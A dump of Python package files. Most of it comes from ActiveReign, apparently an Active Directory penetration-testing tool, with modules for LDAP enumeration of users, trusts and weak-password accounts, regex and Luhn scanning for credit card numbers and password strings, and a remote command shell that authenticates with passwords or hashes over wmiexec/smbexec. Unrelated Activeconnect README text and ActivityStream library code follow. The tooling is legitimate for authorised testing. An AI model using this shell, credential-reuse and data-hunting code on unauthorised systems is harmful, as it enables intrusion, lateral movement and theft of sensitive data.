return | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/file_parser/__init__.py | __init__.py |
from re import findall
def parse_data(contents, regex, max_chars, filename):
# Get file data
line_count = 1
# Splitlines and look for regex matches
for line in contents.splitlines():
if line:
# Parse line for sensitive information
search_data = regex_search(regex, max_chars, line, line_count, filename)
if search_data:
# Return on first found match in file
return search_data
line_count += 1
# Close & return on no match
return False
def regex_search(regex, max_chars, line, line_count, filename):
# Function called by various modules to identify regex patters from text
try:
line = line[:max_chars].decode('UTF-8')
except:
line = line[:max_chars]
# Begin regex lookup
for key, value in regex.items():
try:
for x in findall(value, line):
# Skip credit card lookup for pdf files (false positives)
if key == 'Credit Card' and filename.endswith('pdf'):
pass
elif key == 'Credit Card' and luhn_checksum(x) != 0:
pass
else:
# return after one positive match in line
return { 'Parser': 'Regex',
'ParserDetails': key,
'LineCount': line_count,
'LineSample': """{}""".format(x)}#.replace("\"", "'")}
except Exception as e:
if "bytes-like object" in str(e):
return False
return False
def luhn_checksum(card_number):
# Src: https://stackoverflow.com/questions/21079439/implementation-of-luhn-formula
def digits_of(n):
return [int(d) for d in str(n)]
digits = digits_of(card_number)
odd_digits = digits[-1::-2]
even_digits = digits[-2::-2]
checksum = 0
checksum += sum(odd_digits)
for d in even_digits:
checksum += sum(digits_of(d * 2))
return checksum % 10 | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/file_parser/parse_regex.py | parse_regex.py |
import argparse
from os import path
from getpass import getpass
def file_exists(parser, filename):
if not path.exists(filename):
parser.error("Input file not found: {}".format(filename))
return [x.strip() for x in open(filename)]
def query_args(sub_parser):
query_parser = sub_parser.add_parser("query", help='- Perform LDAP queries on domain')
# Output / Display Options
query_parser.add_argument('-t', dest='timeout', type=int, default=3, help='Connection Timeout')
query_parser.add_argument('-srv', '--ldap-srv', dest='ldap_srv', type=str, default='', help='LDAP Server')
qtypes = query_parser.add_argument_group("Query Types")
qtypes.add_argument('--users', dest="users", action='store_true', help="Query domain users")
qtypes.add_argument('--groups', dest="groups", action='store_true', help="Query domain groups")
qtypes.add_argument('--computers', dest="computers", action='store_true', help="Query domain computers")
qtypes.add_argument('--domain', dest="qdomain", action='store_true', help="Query domain information")
qtypes.add_argument('--trust', dest="trust", action='store_true', help="Enumerate domain trust relationships")
qtypes.add_argument('--reversible-encryption', dest="reversible_encryption", action='store_true', help="Lookup users with reversible encryption")
qtypes.add_argument('--pass-never-expire', dest="pass_never_expire", action='store_true',help="Lookup users whos password never expires")
qtypes.add_argument('--pass-not-required', dest="pass_not_required", action='store_true',help="Lookup users with password not required")
qtypes.add_argument('--recon', dest="recon", action='store_true',help="Perform recon on the domain and populates the AR3 database for enumeration")
qtypes.add_argument('--custom', dest="custom", type=str, default='', help="Perform custom query")
qoptions = query_parser.add_argument_group("Query Options")
qoptions.add_argument('-q', '--query', dest='query', type=str, default='', help='Specify user, computer, or group to query')
qoptions.add_argument('-a', dest='attrs', type=str, default='', help='Specify attrs to query')
qoptions.add_argument('--all', dest='all', action='store_true', help='Enumerate all users (even disabled) or all groups & members')
auth = query_parser.add_argument_group("Query Authentication")
auth.add_argument('-id', dest='cred_id', type=int, help='Use creds from db for queries')
auth.add_argument('-u', dest='user', type=str, default='', required=False, help='Set username (Default=null)')
auth.add_argument('-d', dest='domain', type=str, default='', help='Domain Name')
query_pwd = auth.add_mutually_exclusive_group(required=False)
query_pwd.add_argument('-H','-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
query_pwd.add_argument('-p', dest='passwd', type=str, default='', help='Set password (Default=null)')
outdata = query_parser.add_argument_group("Output Options")
outdata.add_argument('-v','--verbose', dest="verbose", action='store_true', help="Show attribute fields and values")
outdata.add_argument('--data-only', dest="data_only", action='store_true', help="Show data only (Copy/Paste Format)")
outdata.add_argument('--parse', dest="parse", action='store_true', help="Parse text fields for sensitive information")
# Hidden Args: Required for execution methods to work but not applicable to the operational mode
query_parser.add_argument('--local-auth', dest="local_auth", action='store_true', help=argparse.SUPPRESS)
def parse_attrs(attrs):
if not attrs:
return []
else:
return attrs.split(",")
def query_arg_mods(args, db_obj, loggers):
logger = loggers['console']
args.attrs = parse_attrs(args.attrs)
if args.hash:
args.passwd.append(False)
elif not args.passwd and args.user:
args.passwd = [getpass("Enter password, or continue with null-value: ")]
if args.cred_id and not args.user:
enum_user = db_obj.extract_user(args.cred_id)
if enum_user:
args.user = enum_user[0][0]
args.passwd = enum_user[0][1]
args.hash = enum_user[0][2]
args.domain = enum_user[0][3]
else:
logger.fail("Unable to gather credentials from db, try again")
exit(1)
if args.hash:
logger.status(['Query Authentication', '{}\{} (Password: None) (Hash: True)'.format(args.domain, args.user)])
else:
logger.status(['Query Authentication', '{}\{} (Password: {}****) (Hash: False)'.format(args.domain, args.user, args.passwd[:1])])
return args | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/query/arg_parser.py | arg_parser.py |
from dns.resolver import Resolver
from ar3.core.ldap import LdapCon
from ar3.core.ldap.query import QUERIES, ATTRIBUTES, UAC_LOOKUP
def resolve_host(host, dns_server):
# Reuses ldap_srv value to resolve dns names (Assumes this is a DC)
try:
res = Resolver()
res.timeout = 3
res.lifetime = 3
res.nameservers = [dns_server]
dns_query = res.query(host, "A")
for ip in dns_query:
return ip
except KeyboardInterrupt:
exit(0)
except:
pass
return ''
def attribute_parser(logger, host, ip, key, attribute, data, title="PARSER"):
KEYWORDS = ['password', 'key', 'login', 'logon', 'pass']
for k in KEYWORDS:
if k in data.lower():
logger.success([host, ip, title.upper(), '{:<10} Attribute: {:<15} Value: \"{}\"'.format(key, attribute, data)])
#########################
# USERS
#########################
def user_query(args, query, loggers, db_obj, user_lookup=False):
resp = query.user_query(user_lookup, args.attrs, all_users=args.all)
for key, data in resp.items():
try:
data['sAMAccountName'] = data['sAMAccountName'].replace("\'", '')
db_obj.update_username(args.domain, data['sAMAccountName'])
user_handler(args, loggers['console'], query.host, query.ip, data['sAMAccountName'], data)
except Exception as e:
loggers['console'].warning(["Query Error {}".format(key), str(e)])
def user_handler(args, logger, host, ip, user, data):
if args.data_only:
logger.output(user)
return
for attribute, value in data.items():
if args.parse and attribute.lower() in ['info','comment','description']:
attribute_parser(logger, host, ip, user, attribute, value)
# UserAccountControl Lookup
if attribute == 'userAccountControl':
if value in UAC_LOOKUP.keys():
value = "{} ({})".format(UAC_LOOKUP[value], value)
if (args.verbose) or (args.query):
logger.info([host, ip, "USERS", "{:<20} {:<24} : {}".format(user, attribute, value)])
else:
logger.info([host, ip, "USERS", user])
return
#########################
# GROUPS
#########################
def group_query_all(args, query, loggers, db_obj):
# Enumerate all groups and users on the domain
for group in query.con.group_query([]).keys():
group_query(args, query.con, loggers, db_obj, group_lookup=group)
def group_query(args, query, loggers, db_obj, group_lookup=False):
# Enum groups or lookup members of a single group
if group_lookup:
resp = query.group_membership(group_lookup, args.attrs)
if resp:
db_obj.update_group(group_lookup, args.domain)
for key, data in resp.items():
key = key.replace("\'", '')
try:
if 'userAccountControl' in data.keys():
db_obj.update_username(args.domain, key)
db_obj.update_user_members(args.domain, key, group_lookup)
group_membership_handler(args, loggers['console'], query.host, query.ip, key, data, group_lookup)
else:
db_obj.update_group(key, args.domain)
db_obj.update_group_members(args.domain, key, group_lookup)
group_membership_handler(args, loggers['console'], query.host, query.ip, key, data, group_lookup, title='MEMBER: GROUP')
except Exception as e:
loggers['console'].warning(["Query Error {}".format(key), str(e)])
else:
resp = query.group_query(args.attrs)
for key, data in resp.items():
try:
key = key.replace("\'", '')
db_obj.update_group(key, args.domain)
group_handler(args, loggers['console'], query.host, query.ip, key, data)
except Exception as e:
loggers['console'].warning(["Query Error {}".format(key), str(e)])
def group_handler(args, logger, host, ip, key, data):
if args.data_only:
logger.output(key)
return
for attribute, value in data.items():
if args.parse and attribute.lower() in ['info', 'comment', 'description']:
attribute_parser(logger, host, ip, key, attribute, value)
if args.verbose:
logger.info([host, ip, "GROUPS", "{:<40} {:<25} : {}".format(key, attribute, value)])
else:
try:
logger.info([host, ip, "GROUPS", key, data['description']])
except:
logger.info([host, ip, "GROUPS", key])
return
def group_membership_handler(args, logger, host, ip, user, data, group, title='MEMBER: USER'):
if args.data_only:
logger.output(user)
return
for attribute, value in data.items():
if args.parse and attribute.lower() in ['info', 'comment', 'description']:
attribute_parser(logger, host, ip, user, attribute, value)
if args.verbose:
logger.info([host, ip, title, "{:<40} {:<25} {:<20} : {}".format(group, user, attribute, value)])
else:
logger.info([host, ip, title, "{:<40} {}".format(group, user)])
return
#########################
# COMPUTERS
#########################
def computer_query(args, query, loggers, db_obj):
resp = query.computer_query(args.query, args.attrs)
for key, data in resp.items():
try:
computer_handler(args, loggers['console'], query.host, query.ip, key, data, db_obj)
except Exception as e:
loggers['console'].warning(["Query Error {}".format(key), str(e)])
def computer_handler(args, logger, host, ip, key, data, db_obj):
if args.data_only:
logger.output(key)
return
resolve = resolve_host(key, ip)
try:
db_obj.update_host_ldap(key, resolve, args.domain, data['operatingSystem'])
except:
db_obj.update_host_ldap(key, resolve, args.domain, '')
for attribute, value in data.items():
if args.parse and attribute.lower() in ['info','comment','description']:
attribute_parser(logger, host, ip, key, attribute, value)
if args.verbose:
logger.info([host, ip, "COMPUTERS", "{:<35} {:<24} : {:<40} {}".format(key, attribute, value, resolve)])
elif args.query == 'eol':
logger.info([host, ip, "COMPUTERS","{:<35} {} {:<40} {}".format(key, data['operatingSystem'],data['operatingSystemServicePack'], resolve)])
return
else:
logger.info([host, ip, "COMPUTERS", key, resolve])
return
#########################
# DOMAIN
#########################
def domain_query(args, query, loggers, db_obj):
resp = query.domain_query(args.attrs)
for key, data in resp.items():
domain_handler(args, loggers['console'], query.host, query.ip, key, data, db_obj)
def domain_handler(args, logger, host, ip, key, data, db_obj):
if args.data_only:
logger.output(key)
return
try:
db_obj.update_domain_ldap(args.domain, data['lockoutThreshold'], data['lockoutDuration'], data['minPwdLength'], data['maxPwdAge'])
except:
db_obj.update_domain(args.domain, data['lockoutThreshold'])
for attribute, value in data.items():
logger.info([host, ip, "DOMAIN", "{:<20} {:<24} : {}".format(key, attribute, value)])
#########################
# TRUSTS
#########################
def trust_query(args, query, loggers, db_obj):
resp = query.trust_query(args.attrs)
for key, data in resp.items():
trust_handler(args, loggers['console'], query.host, query.ip, key, data)
def trust_handler(args, logger, host, ip, key, data):
if args.data_only:
logger.output(key)
return
for attribute, value in data.items():
logger.info([host, ip, "TRUST", "{:<20} {:<24} : {}".format(key, attribute, value)])
#########################
# CUSTOM
#########################
def custom_query(args, cust_query, cust_attr, query_obj, loggers, db_obj, title='CUSTOM'):
resp = query_obj.custom_query(cust_query, cust_attr)
for key, data in resp.items():
custom_handler(args, loggers['console'], query_obj.host, query_obj.ip, key, data, title)
def custom_handler(args, logger, host, ip, key, data, title):
if args.data_only:
logger.output(key)
return
for attribute, value in data.items():
if args.parse and attribute.lower() in ['info','comment','description']:
attribute_parser(logger, host, ip, key, attribute, value)
if args.verbose:
logger.info([host, ip, title.upper(), "{:<35} {:<24} : {}".format(key, attribute, value)])
else:
logger.info([host, ip, title.upper(), key])
return
def create_con(args, loggers, db_obj):
query = LdapCon(args, loggers, args.ldap_srv, db_obj)
query.create_ldap_con()
#########################
# Recon
#########################
def recon(args, query, loggers, db_obj):
"""
Reconnection to avoid timeout
"""
query.create_ldap_con()
domain_query(args, query.con, loggers, db_obj)
query.close()
query.create_ldap_con()
user_query(args, query.con, loggers, db_obj, user_lookup="{active}")
query.close()
query.create_ldap_con()
group_query_all(args, query, loggers, db_obj)
query.close()
query.create_ldap_con()
computer_query(args, query.con, loggers, db_obj)
#########################
# Connection
#########################
class LDAPHandler():
"""
Small class to handle ldap connection. Otherwise we receive a timeout
error when attempting multiple queries on the same connection.
"""
def __init__(self, args, loggers, db_obj):
self.con = False
self.count = 0
self.args = args
self.loggers = loggers
self.db = db_obj
def create_ldap_con(self):
try:
if self.con:
self.con.close()
self.con = LdapCon(self.args, self.loggers, self.args.ldap_srv, self.db)
self.con.create_ldap_con()
self.count += 1
if self.count == 1:
# Output formatting indicating a successful connection
self.loggers['console'].success(['LDAP Connection','Connection established (server: {}) (LDAPS: {})'.format(self.con.host,self.con.ldaps)])
except Exception as e:
raise Exception(e)
def close(self):
if self.con:
self.con.close()
#########################
# Main
#########################
def main(args, config_obj, db_obj, loggers):
try:
query = LDAPHandler(args, loggers, db_obj)
if args.recon:
recon(args, query, loggers, db_obj)
if args.qdomain:
query.create_ldap_con()
domain_query(args, query.con, loggers, db_obj)
if args.trust:
query.create_ldap_con()
trust_query(args, query.con, loggers, db_obj)
if args.users:
query.create_ldap_con()
user_query(args, query.con, loggers, db_obj, user_lookup=args.query)
if args.groups:
query.create_ldap_con()
if args.all:
group_query_all(args, query, loggers, db_obj)
else:
group_query(args, query.con, loggers, db_obj, group_lookup=args.query)
if args.computers:
query.create_ldap_con()
computer_query(args, query.con, loggers, db_obj)
if args.pass_never_expire:
query.create_ldap_con()
custom_query(args, QUERIES['pass_never_expire'], ATTRIBUTES['users'] + args.attrs, query.con, loggers, db_obj, title="PASS NEVER EXPIRE ")
if args.pass_not_required:
query.create_ldap_con()
custom_query(args, QUERIES['pass_not_required'], ATTRIBUTES['users'] + args.attrs, query.con, loggers, db_obj, title="PASS NOT REQUIRED ")
if args.reversible_encryption:
query.create_ldap_con()
custom_query(args, QUERIES['reversible_encryption'], ATTRIBUTES['users'], query.con, loggers, db_obj, title="REVERSIBLE ENCRYPTION ")
if args.custom:
query.create_ldap_con()
custom_query(args, args.custom, args.attrs, query.con, loggers, db_obj)
query.close()
except Exception as e:
if "invalidCredentials" in str(e):
loggers['console'].fail(["LDAP Error", "Authentication failed"])
else:
loggers['console'].fail(["Query Error", str(e)]) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/query/__init__.py | __init__.py |
import argparse
from getpass import getpass
def shell_args(sub_parser):
# Create Subparser
shell_parser = sub_parser.add_parser("shell", help='- Spawn emulated shell on system')
# Domain
shell_domain = shell_parser.add_mutually_exclusive_group(required=False)
shell_domain.add_argument('-t', dest='timeout', type=int, default=5,help='Connection timeout')
shell_domain.add_argument('-d', dest='domain', type=str, default='', help='Set domain (Default=null)')
shell_domain.add_argument('--local-auth', dest='local_auth', action='store_true', help='Authenticate to target host, no domain')
shell_parser.add_argument('-id', dest='cred_id', type=int, help='Use creds from db for shell access')
shell_parser.add_argument('-u', dest='user', type=str, default='', help='Admin Username')
shell_pwd = shell_parser.add_mutually_exclusive_group(required=False)
shell_pwd.add_argument('-H','-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
shell_pwd.add_argument('-p', dest='passwd', type=str, default='', help='Set password (Default=null)')
execution = shell_parser.add_argument_group("Command Execution")
execution.add_argument('--exec-method', dest='exec_method', type=str, default='wmiexec',help='Code execution method {wmiexec, smbexec}')
execution.add_argument('--exec-ip', dest='exec_ip', type=str, default='127.0.0.1',help='Set server used for code execution output')
execution.add_argument('--exec-share', dest='exec_share', type=str, default='C$',help='Set share used for code execution output')
execution.add_argument('--exec-path', dest='exec_path', type=str, default='\\Windows\\Temp\\',help='Set path used for code execution output')
execution.add_argument('--fileless', dest='fileless', action='store_true',help='Spawn SMB server for code execution output')
# Hidden Args: Required for execution methods to work but not applicable to the operational mode
execution.add_argument('--ps_execute', dest='ps_execute', action='store_true',help=argparse.SUPPRESS)
execution.add_argument('--fileless_sharename', dest='fileless_sharename', type=str, default='',help=argparse.SUPPRESS)
execution.add_argument('--no-output', dest='no_output', action='store_true', help=argparse.SUPPRESS)
execution.add_argument('--slack', dest='slack', action='store_true', help=argparse.SUPPRESS)
shell_parser.add_argument(dest='target', nargs='+', help='System to generate simulated shell')
def shell_arg_mods(args, db_obj, loggers):
if args.user and not args.passwd and not args.hash:
# Get password if not provided
args.passwd = getpass("Enter password, or continue with null-value: ")
if args.cred_id and not args.user:
enum_user = db_obj.extract_user(args.cred_id)
if enum_user:
args.user = enum_user[0][0]
args.passwd = enum_user[0][1]
args.hash = enum_user[0][2]
args.domain = enum_user[0][3]
else:
loggers['console'].fail("Unable to gather credentials from db, check workspace and try again")
exit(1)
args.target = args.target[0]
if args.hash:
loggers['console'].status(['Shell Authentication: {}\{} (Password: None) (Hash: True)'.format(args.domain, args.user)])
else:
loggers['console'].status(['Shell Authentication: {}\{} (Password: {}****) (Hash: False)'.format(args.domain, args.user, args.passwd[:1])])
return args | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/shell/arg_parser.py | arg_parser.py |
import os
from ar3.core.smb import SmbCon
from ar3.servers.smb import SMBServer
from ar3.core.connector import Connector
from ar3.helpers.misc import gen_random_string
from ar3.ops.enum.host_enum import code_execution
class AR3Shell(Connector):
def __init__(self, args, db_obj, config_obj, loggers):
Connector.__init__(self, args, loggers, args.target)
self.output = []
self.pwd_list = ['C:', 'Windows', 'System32']
self.pwd = '\\'.join(self.pwd_list)
self.exec_method = args.exec_method
self.sharename = args.fileless_sharename
self.db = db_obj
self.config_obj = config_obj
try:
# Setup Smb Connection
self.logger.status('Initiating remote connection')
self.smbcon = SmbCon(self.args, loggers, self.host, self.db)
self.smbcon.create_smb_con()
# Execute command to verify permissions
self.cmd_execution('ECHO %USERDOMAIN%\%USERNAME%')
self.logger.success('Starting emulated shell (Host: {}) (User: {}) (Method: {}) (Fileless: {})'.format(self.host, self.output[0].strip(), self.exec_method, str(args.fileless)))
self.logger.warning("This is a limited shell and requires full paths for file interactions\n")
except Exception as e:
self.logger.fail("Error Starting Shell: {}".format(str(e)))
exit(1)
def help(self):
print("""
help - show this menu
exit - Close shell
Navigation:
pwd - Show PWD
dir - List PWD
cd - Change directory
File Interactions:
type [remote_file] - Show file contents (Full Path Required)
download [remote_file] [location] - Download remote file (Full Path Required)
upload [local_file] [location] - Upload local file (Full Path Required)
delete [remote_file] - Delete remote file (Full Path Required)
Commands:
[cmd] - Execute remote cmd
""")
def cd(self, cmd):
if cmd.startswith('cd'):
try:
cd_path = cmd.split(' ')[1]
cd_split = cd_path.replace("\\", "/").split("/") # Input formatting
cd_split = [x for x in cd_split if x] # Remove blanks
if cd_path == "/" or cd_path == "\\":
self.pwd_list = ['C:']
# Dir up
elif cd_split[0] == "..":
self.pwd_list.pop(-1)
cd_split.pop(cd_split.index(".."))
# new dir
elif cd_path.startswith(("/", "\\")):
self.pwd_list = ['C:']
self.pwd_list = self.pwd_list + cd_split
except:
self.logger.FAIL('Unable to change directories')
def dir(self, cmd):
if cmd == "dir":
return self.cmd_execution("dir {}".format(self.pwd))
else:
return self.cmd_execution(cmd)
def download(self, cmd):
try:
val = cmd.split(" ")
self.smbcon.downloadFile(val[1], val[2])
self.logger.success("Download Complete: {}".format(val[2]))
except Exception as e:
if str(e) == "list index out of range":
self.logger.fail('Not enough values to unpack, see -h for more')
else:
self.logger.fail("Download Failed: {}".format(str(e)))
def upload(self, cmd):
try:
val = cmd.split(" ")
self.smbcon.uploadFile(val[1], val[2])
self.logger.success("Upload Complete: {}".format(val[2]))
except Exception as e:
if str(e) == "list index out of range":
self.logger.fail('Not enough values to unpack, see -h for more')
else:
self.logger.fail("Upload Failed: {}".format(str(e)))
def delete(self, cmd):
try:
val = cmd.split(" ")
self.smbcon.deleteFile(val[1])
self.logger.success("Download Complete: {}".format(val[1]))
except Exception as e:
if str(e) == "list index out of range":
self.logger.fail('Not enough values to unpack, see -h for more')
else:
self.logger.fail("Deletion Failed: {}".format(str(e)))
def cmd_execution(self, cmd):
resp = code_execution(self.smbcon, self.args, self.host, self.loggers, self.config_obj, cmd, return_data=True)
self.output = resp.splitlines()
def cmdloop(self):
while True:
try:
# init prompt
self.output = []
self.pwd = '\\'.join(self.pwd_list)
cmd = input("{}> ".format(self.pwd))
cmd = cmd.lstrip().rstrip()
self.logger.debug("User cmd ::: \'{}\'".format(cmd))
# Handle CMD input
if cmd == "help":
self.help()
elif cmd == 'exit':
try:
self.smbcon.close()
except:
pass
return True
elif cmd.startswith('cd'):
self.cd(cmd)
elif cmd.startswith('dir'):
self.dir(cmd)
elif cmd.startswith('download'):
self.download(cmd)
elif cmd.startswith('upload'):
self.upload(cmd)
elif cmd.startswith('delete'):
self.delete(cmd)
elif cmd == 'pwd':
self.logger.output(self.pwd)
else:
self.output = self.cmd_execution(cmd)
# Show cmd Output
for result in self.output:
self.logger.output(result)
except KeyboardInterrupt:
try:
self.smbcon.close()
except:
pass
return True
except Exception as e:
self.logger.debug(str(e))
def main(args, config_obj, db_obj, loggers):
shell = None
smb_srv_obj = None
try:
# Init smb server
if args.fileless:
# Start smbserver
setattr(args, 'fileless_sharename', 'TEMP-{}$'.format(gen_random_string()))
smb_srv_obj = SMBServer(loggers['console'], args.fileless_sharename, verbose=args.debug)
smb_srv_obj.start()
# Enter CMD Loop
shell = AR3Shell(args, db_obj, config_obj, loggers)
shell.cmdloop()
# Close smbserver & exit
if args.fileless:
smb_srv_obj.cleanup_server()
smb_srv_obj.server = None
os._exit(0)
except KeyboardInterrupt:
# Cleanup and close
if shell:
shell.smbcon.close()
if smb_srv_obj:
smb_srv_obj.cleanup_server()
return | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/shell/__init__.py | __init__.py |
# Activeconnect
[Activeconnect](https://activeconnect.io) provides multifactor identity and presence verification.
This library provides a Python wrapper for the Activeconnect API.
## Getting Started
### Create an Activeconnect Account
To begin visit [Activeconnect Developer Portal](https://activeconnect.activeapi.ninja/register) to register.
### Create an Activeconnect Application
Once you have registered [create a new Activeconnect application](https://activeconnect.activeapi.ninja/create_application).
Save the Application ID and Application Secret in a safe place as you will need this to authenticate calls to the Activeconnect API.
### Register Users
Activeconnect identifies application users using a token supplied by the application developer.
You can use your existing user IDs or create a lookup table that maps your user ID to a value you provide to Activeconnect.
Users are registered using the Activeconnect ManagementAPI.
Create an instance of Activeconnect.ManagementAPI using your application ID and secret.
```python
from Activeconnect.management_api import ManagementAPI
from Activeconnect.management_api import ManagementAPIResult
application_id = "MY APPLICATION ID"
application_secret = "MY APPLICATION SECRET"
manager = ManagementAPI(application_id="MY APPLICATION ID", application_secret="MY APPLICATION SECRET")
```
To add a single user call ManagementAPI.add_user
```python
add_user_result = manager.add_user("MY USER")
if add_user_result == ManagementAPIResult.success:
# User added
print("user added")
elif add_user_result == ManagementAPIResult.user_exists:
# User already exists
print("user already exists")
else:
# User failed
print("add user failed")
```
To add multiple users call ManagementAPI.add_users.
```python
users = ["MY USER 1", "MY USER 2", "MY USER 3"]
created, existing = manager.add_users(users)
if created is not None:
print("Users created: {}".format(created))
if existing is not None:
print("Existing users: {}".format(existing))
```
### Registering a Mobile Device
Activeconnect uses a mobile device to collect authentication data.
Mobile devices are registered using a registration link generated by Activeconnect.
The Activeconnect mobile application is registered to open these links and register the device.
To obtain a registration link use ManagementAPI.get_registration_link.
The display_name query parameter is optional and is used by the Activeconnect mobile app to provide a description of the user.
```python
registration_link = manager.get_registration_link(user_id="MY USER 1", display_name="MY USER 1@myapp")
```
ManagementAPI also provides a helper method to send a registration link to a mobile device using SMS.
```python
manager.send_registration_sms( user_id="MY USER 1",
display_name="MY USER1@myapp",
phone_number="+1XXXYYYY",
message=None)
```
You can specify a message for the SMS body
```python
manager.send_registration_sms( user_id="MY USER 1",
display_name="MY USER1@myapp",
phone_number="+1XXXYYYY",
message="REGISTER FOR MY APP")
```
### Registering a Mobile Device
Before a user can authenticate using Activeconnect they must register a mobile device.
To check if a user has registered a mobile device use ManagementAPI.has_registered_mobile_device
```python
has_device = manager.has_registered_mobile_device("MY USER 1")
if has_device is ManagementAPIResult.has_mobile_device:
print("User has mobile device.")
elif has_device is ManagementAPIResult.no_mobile_device:
print("User has no mobile device.")
else:
print("has_registered_mobile_device failed.")
```
### Removing Users
To remove a single user use ManagementAPI.delete_user
```python
manager.delete_use("MY USER 1")
```
To remove multiple users use ManagementAPI.delete_users
```python
users=["MY USER 1", "MY USER 2",...]
manager.delete_users(users)
```
### Authenticating Users
Activeconnect authentication is a multi step process:
* Initiate the authentication process using the Authentication API.
* If the process is initiated the mobile device will collect authentication data and send it to Activeconnect
* Activeconnect processes the collected data and determines whether the user is authenticated.
Create an instance of Activeconnect.AuthenticationAPI using the application ID and application secret created above.
```python
from Activeconnect.authentication_api import AuthenticationAPI,AuthenticationMethod
authenticator=AuthenticationAPI(application_id="MY APPLICATION ID",
application_secret="MY APPLICATION SECRET")
# Initiate the authentication process.
session = authenticator.authenticate_user("MY USER 1")
# Check if authentication started.
if session.failed:
# Authentication failed - check the failure reason.
# If the user has not registered a mobile device, the failure_reason will be NO_MOBILE_DEVICE
print("Authentication failed {}".format(session.failure_reason))
elif session.in_progress:
# Authentication is in progress
print("Authentication in progress")
else:
print("Session status is {}".format(session.session_status.name))
```
Once the authentication process is initiated periodically check the status of the session using Activeconnect.Session.getStatus.
```python
# Wait for the user to approve the request.
while session.in_progress:
# Get the status of the session
session_status = session.get_status()
# Wait a while and try again
time.sleep(5)
if session.active:
print("authenticated")
# Now end the session
session.destroy()
else:
print("Authentication failed {}".format(session.session_status.name))
```
### Ending a Session
To end an Activeconnect session call Activeconnect.Session.destroy.
```python
session.destroy()
```
### Session Serialization
It may be necessary to save session information in cookies or pass session information with URLS.
Activeconnect.Session is derived from [marshmallow dataclass](https://pypi.org/project/marshmallow-dataclass/) and can be serialized as JSON.
```python
# Save a session as JSON
session_json=Session.Schema().dumps(session)
# Load a session from JSON
new_session=Session.Schema().loads(session_json)
```
It is recommeded that the generated JSON in encrypted before storing.
One way to do this is to use [the itsdangerous package](https://pypi.org/project/itsdangerous/).
```python
from itsdangerous.url_safe import URLSafeSerializer
# Convert the session to JSON.
session_json=Session.Schema().dumps(session)
# Encode/encrypt the session JSON
s = URLSafeSerializer("secret-key")
session_token = s.dumps(session_json)
# Store the session_token...
``` | Activeconnect | /Activeconnect-0.0.10.tar.gz/Activeconnect-0.0.10/README.md | README.md |
import abc
class NodeBase:
"""A node in the network.
:ivar node_id: A string that uniquely identifies this node in the network.
"""
def __init__(self):
self.node_id = None
class ActivityObjectBase:
"""A thing which participates in an Activity.
:ivar activity_name str:
Unicode representation of this object.
:ivar activity_url str:
URL of this object.
:ivar activity_extras dict:
A BSON-serializable dict of extra stuff to store on the activity.
"""
def __init__(self):
self.activity_name = None
self.activity_url = None
self.activity_extras = {}
class ActivityBase:
"""Tells the story of a person performing an action on or with an object.
Consists of an actor, a verb, an object, and optionally a target.
Defines the following attributes:
:ivar actor:
The actor, or subject, of the Activity.
Example: *John* posted a comment on ticket #42.
:class:`NodeBase, ActivityObjectBase`
:ivar verb:
The verb in the Activity.
Example: John *posted* a comment on ticket #42.
:class:`str`
:ivar obj:
The object of the Activity.
Example: John posted *a comment* on ticket #42.
:class:`ActivityObjectBase`
:ivar target:
The (optional) target of the Activity.
Example: John posted a comment on *ticket #42*.
:class:`ActivityObjectBase`
:ivar published:
The datetime at which the Activity was published.
:class:`datetime.datetime`
"""
def __init__(self):
self.actor = None
self.verb = None
self.obj = None
self.target = None
self.published = None
class NodeManagerBase(metaclass=abc.ABCMeta):
"""Manages the network of connected nodes.
Knows how to connect and disconnect nodes and serialize the graph.
"""
@abc.abstractmethod
def follow(self, follower, following):
"""Create a directed edge from :class:`NodeBase` ``follower`` to
:class:`NodeBase` ``following``.
"""
return
@abc.abstractmethod
def unfollow(self, follower, following):
"""Destroy a directed edge from :class:`NodeBase` ``follower`` to
:class:`NodeBase` ``following``.
"""
return
class ActivityManagerBase(metaclass=abc.ABCMeta):
"""Serializes :class:`ActivityBase` objects."""
@abc.abstractmethod
def create(self, actor, verb, obj, target=None):
"""Create and serialize an :class:`ActivityBase`."""
return | ActivityStream | /ActivityStream-0.4.0-py3-none-any.whl/activitystream/base.py | base.py |
import logging
import threading
from pkg_resources import iter_entry_points
from .managers import NodeManager, ActivityManager, Aggregator
from .storage import pymongostorage
log = logging.getLogger(__name__)
_director = None
class ActivityDirector(threading.local):
def __init__(self, **conf):
self._default_impls = {
'director': ActivityDirector,
'storage': pymongostorage.PymongoStorage,
'nodemanager': NodeManager,
'activitymanager': ActivityManager,
'aggregator': Aggregator,
}
self.conf = conf
self.entry_points = self._load_entry_points()
storage = self._get_impl('storage')(conf)
self.node_manager = self._get_impl('nodemanager')(storage)
self.activity_manager = self._get_impl('activitymanager')(storage,
self.node_manager)
self.aggregator = self._get_impl('aggregator')(self.activity_manager,
self.node_manager)
def _load_entry_points(self):
return {ep.name: ep.load() for ep in
iter_entry_points(group='activitystream')}
def _get_impl(self, name):
return self.entry_points.get(name, self._default_impls.get(name))
def connect(self, follower, following):
self.node_manager.follow(follower, following)
def disconnect(self, follower, following):
self.node_manager.unfollow(follower, following)
def is_connected(self, follower, following):
return self.node_manager.is_following(follower, following)
def create_activity(self, actor, verb, obj, target=None,
related_nodes=None, tags=None):
return self.activity_manager.create(actor, verb, obj, target=target,
related_nodes=related_nodes, tags=tags)
def create_timeline(self, node_id):
"""Create an up-to-date timeline for the ``node_id`` Node.
"""
self.aggregator.create_timeline(node_id)
def create_timelines(self, node_id):
"""Create an up-to-date timeline for the ``node_id`` Node and all of
its followers.
"""
self.create_timeline(node_id)
node = self.node_manager.get_node(node_id)
if node and node.followers:
for n in self.node_manager.get_nodes(node.followers):
self.create_timeline(n.node_id)
def get_timeline(self, *args, **kw):
return self.aggregator.get_timeline(*args, **kw)
def configure(**conf):
global _director
defaults = {
'activitystream.master': 'mongodb://127.0.0.1:27017',
'activitystream.database': 'activitystream',
'activitystream.activity_collection': 'activities',
'activitystream.node_collection': 'nodes',
}
